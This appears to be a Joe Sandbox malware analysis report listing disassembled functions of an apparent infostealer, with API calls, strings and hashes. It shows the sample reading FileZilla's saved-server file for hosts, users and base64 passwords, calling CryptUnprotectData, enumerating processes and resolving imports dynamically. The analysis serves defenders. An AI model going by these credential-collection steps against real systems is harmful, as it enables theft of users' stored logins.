Opcode Fuzzy Hash: dacb57850d66782377522a9435381e453c63e497f7ff3c65cf8400c43a46bae6
Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
LocalFree.KERNEL32(00000000), ref: 004146DF

Strings

/ , xrefs: 0041463C

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 6eef88f51cbf550a8aec89bf7c418da88a36dd60d8d6896051e4d05abf3fb1a3
Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
Opcode Fuzzy Hash: 6eef88f51cbf550a8aec89bf7c418da88a36dd60d8d6896051e4d05abf3fb1a3
Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306

Strings

\*.*, xrefs: 0040DB7D

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*
API String ID: 433455689-1173974218
Opcode ID: 86e080d9cd1b4982ceaf50f7c7610976cf2768a9555e7aa38e603370a324cd28
Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
Opcode Fuzzy Hash: 86e080d9cd1b4982ceaf50f7c7610976cf2768a9555e7aa38e603370a324cd28
Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Strings

>N@, xrefs: 004155B8, 00415614, 004155BB, 00415617

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: >N@
API String ID: 80407269-3381801619
Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
CloseHandle.KERNEL32(0041D599), ref: 00415D7A

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,042863A8,00000000,?,0041D758,00000000,?,00000000,00000000,?,04286930,00000000), ref: 004144C0
HeapAlloc.KERNEL32(00000000), ref: 004144C7
GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
wsprintfA.USER32 ref: 00414514

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97

Uniqueness

Uniqueness Score: -1.00%

Function 00409540 Relevance: 4.5, APIs: 3, Instructions: 49memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
LocalFree.KERNEL32(?), ref: 004095AF

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004143C0 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00401177,04280330,004136EB,0041D6E3), ref: 004143CD
HeapAlloc.KERNEL32(00000000), ref: 004143D4
GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91

Uniqueness

Uniqueness Score: -1.00%

Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
ExitProcess.KERNEL32 ref: 0040113E

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65

Uniqueness

Uniqueness Score: -1.00%

Function 004070E0 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
lstrcat.KERNEL32(?,042839D8), ref: 004072AB
lstrcat.KERNEL32(?,?), ref: 004072BF
lstrcat.KERNEL32(?,?), ref: 004072D3
lstrcat.KERNEL32(?,?), ref: 004072E7
lstrcat.KERNEL32(?,04285DD8), ref: 004072FB
lstrcat.KERNEL32(?,04285C58), ref: 0040730F
lstrcat.KERNEL32(?,04285CB8), ref: 00407322
lstrcat.KERNEL32(?,04285C70), ref: 00407336
lstrcat.KERNEL32(?,04287810), ref: 0040734A
lstrcat.KERNEL32(?,?), ref: 0040735E
lstrcat.KERNEL32(?,?), ref: 00407372
lstrcat.KERNEL32(?,?), ref: 00407386
lstrcat.KERNEL32(?,04285DD8), ref: 00407399
lstrcat.KERNEL32(?,04285C58), ref: 004073AD
lstrcat.KERNEL32(?,04285CB8), ref: 004073C1
lstrcat.KERNEL32(?,04285C70), ref: 004073D4
lstrcat.KERNEL32(?,04287878), ref: 004073E8
lstrcat.KERNEL32(?,?), ref: 004073FC
lstrcat.KERNEL32(?,?), ref: 00407410
lstrcat.KERNEL32(?,?), ref: 00407424
lstrcat.KERNEL32(?,04285DD8), ref: 00407438
lstrcat.KERNEL32(?,04285C58), ref: 0040744B
lstrcat.KERNEL32(?,04285CB8), ref: 0040745F
lstrcat.KERNEL32(?,04285C70), ref: 00407473
lstrcat.KERNEL32(?,042878E0), ref: 00407486
lstrcat.KERNEL32(?,?), ref: 0040749A
lstrcat.KERNEL32(?,?), ref: 004074AE
lstrcat.KERNEL32(?,?), ref: 004074C2
lstrcat.KERNEL32(?,04285DD8), ref: 004074D6
lstrcat.KERNEL32(?,04285C58), ref: 004074EA
lstrcat.KERNEL32(?,04285CB8), ref: 004074FD
lstrcat.KERNEL32(?,04285C70), ref: 00407511
lstrcat.KERNEL32(?,04287948), ref: 00407525
lstrcat.KERNEL32(?,?), ref: 00407539
lstrcat.KERNEL32(?,?), ref: 0040754D
lstrcat.KERNEL32(?,?), ref: 00407561
lstrcat.KERNEL32(?,04285DD8), ref: 00407574
lstrcat.KERNEL32(?,04285C58), ref: 00407588
lstrcat.KERNEL32(?,04285CB8), ref: 0040759C
lstrcat.KERNEL32(?,04285C70), ref: 004075AF
lstrcat.KERNEL32(?,042879B0), ref: 004075C3
lstrcat.KERNEL32(?,?), ref: 004075D7
lstrcat.KERNEL32(?,?), ref: 004075EB
lstrcat.KERNEL32(?,?), ref: 004075FF
lstrcat.KERNEL32(?,04285DD8), ref: 00407613
lstrcat.KERNEL32(?,04285C58), ref: 00407626
lstrcat.KERNEL32(?,04285CB8), ref: 0040763A
lstrcat.KERNEL32(?,04285C70), ref: 0040764E

Part of subcall function 00406FA0: lstrcat.KERNEL32(36A27020,0041DEB8), ref: 00406FD6
Part of subcall function 00406FA0: lstrcat.KERNEL32(36A27020,00000000), ref: 00407018
Part of subcall function 00406FA0: lstrcat.KERNEL32(36A27020, : ), ref: 0040702A
Part of subcall function 00406FA0: lstrcat.KERNEL32(36A27020,00000000), ref: 0040705F
Part of subcall function 00406FA0: lstrcat.KERNEL32(36A27020,0041DEC0), ref: 00407070
Part of subcall function 00406FA0: lstrcat.KERNEL32(36A27020,00000000), ref: 004070A3
Part of subcall function 00406FA0: lstrcat.KERNEL32(36A27020,0041DEC4), ref: 004070BD
Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB

lstrcat.KERNEL32(?,042804B0), ref: 004077DB
lstrcat.KERNEL32(?,04286570), ref: 004077EE
lstrlen.KERNEL32(36A27020), ref: 004077FB
lstrlen.KERNEL32(36A27020), ref: 0040780B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,042805E0), ref: 00404ED9

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
String ID:
API String ID: 3958002797-0
Opcode ID: 814e7d4229aa37309b3bc52efb6d1e8d20644911a3872d3ad355a49d68c7472c
Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
Opcode Fuzzy Hash: 814e7d4229aa37309b3bc52efb6d1e8d20644911a3872d3ad355a49d68c7472c
Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA90 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

strtok_s.MSVCRT ref: 0040EB5B
GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
lstrlen.KERNEL32(00000000), ref: 0040EBD3

Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
lstrlen.KERNEL32(00000000), ref: 0040EC1D
StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
lstrlen.KERNEL32(00000000), ref: 0040EC67
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
lstrlen.KERNEL32(00000000), ref: 0040ECB5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
lstrcat.KERNEL32(?,login: ), ref: 0040EE13
lstrcat.KERNEL32(?,00000000), ref: 0040EE26
lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
lstrcat.KERNEL32(?,password: ), ref: 0040EE44
lstrcat.KERNEL32(?,00000000), ref: 0040EE57
lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
strtok_s.MSVCRT ref: 0040EEB9
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
memset.MSVCRT ref: 0040EF17

Strings

password: , xrefs: 0040EE3B
login: , xrefs: 0040EE0A
<User>, xrefs: 0040EC50
<Port>, xrefs: 0040EC06
<Pass encoding="base64">, xrefs: 0040EC9A
<Host>, xrefs: 0040EBBC
profile: null, xrefs: 0040EDA8
browser: FileZilla, xrefs: 0040ED99
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040EAE4
url: , xrefs: 0040EDB7

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: b409c26cd8da1b868e919d79ed968b73f7e39084298bc20820c9f68796067571
Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
Opcode Fuzzy Hash: b409c26cd8da1b868e919d79ed968b73f7e39084298bc20820c9f68796067571
Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00415ED0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,04263A68), ref: 00415F11
GetProcAddress.KERNEL32(75900000,042638D0), ref: 00415F2A
GetProcAddress.KERNEL32(75900000,04263930), ref: 00415F42
GetProcAddress.KERNEL32(75900000,042639C0), ref: 00415F5A
GetProcAddress.KERNEL32(75900000,04263AC8), ref: 00415F73
GetProcAddress.KERNEL32(75900000,042803E0), ref: 00415F8B
GetProcAddress.KERNEL32(75900000,04264020), ref: 00415FA3
GetProcAddress.KERNEL32(75900000,04263F40), ref: 00415FBC
GetProcAddress.KERNEL32(75900000,04263A80), ref: 00415FD4
GetProcAddress.KERNEL32(75900000,04263918), ref: 00415FEC
GetProcAddress.KERNEL32(75900000,04263948), ref: 00416005
GetProcAddress.KERNEL32(75900000,04280978), ref: 0041601D
GetProcAddress.KERNEL32(75900000,04263FE0), ref: 00416035
GetProcAddress.KERNEL32(75900000,042808B8), ref: 0041604E
GetProcAddress.KERNEL32(75900000,042807C8), ref: 00416066
GetProcAddress.KERNEL32(75900000,04263DA0), ref: 0041607E
GetProcAddress.KERNEL32(75900000,042806D8), ref: 00416097
GetProcAddress.KERNEL32(75900000,042808E8), ref: 004160AF
GetProcAddress.KERNEL32(75900000,04263D20), ref: 004160C7
GetProcAddress.KERNEL32(75900000,04280918), ref: 004160E0
GetProcAddress.KERNEL32(75900000,04264060), ref: 004160F8
LoadLibraryA.KERNEL32(04280828,?,004136C0), ref: 0041610A
LoadLibraryA.KERNEL32(04280930,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(04280810,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(042807E0,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(04280900,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75070000,042807F8), ref: 00416172
GetProcAddress.KERNEL32(75FD0000,042808D0), ref: 00416193
GetProcAddress.KERNEL32(75FD0000,042806A8), ref: 004161AB
GetProcAddress.KERNEL32(75A50000,04280708), ref: 004161CD
GetProcAddress.KERNEL32(74E50000,04263EC0), ref: 004161EE
GetProcAddress.KERNEL32(76E80000,042802D0), ref: 0041620F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000008.00000002.2940259208.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2940259208.0000000000447000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000549000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000624000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.2940259208.0000000000636000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_u2xs.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 54.8, APIs: 22, Strings: 9, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,042805E0), ref: 00404ED9
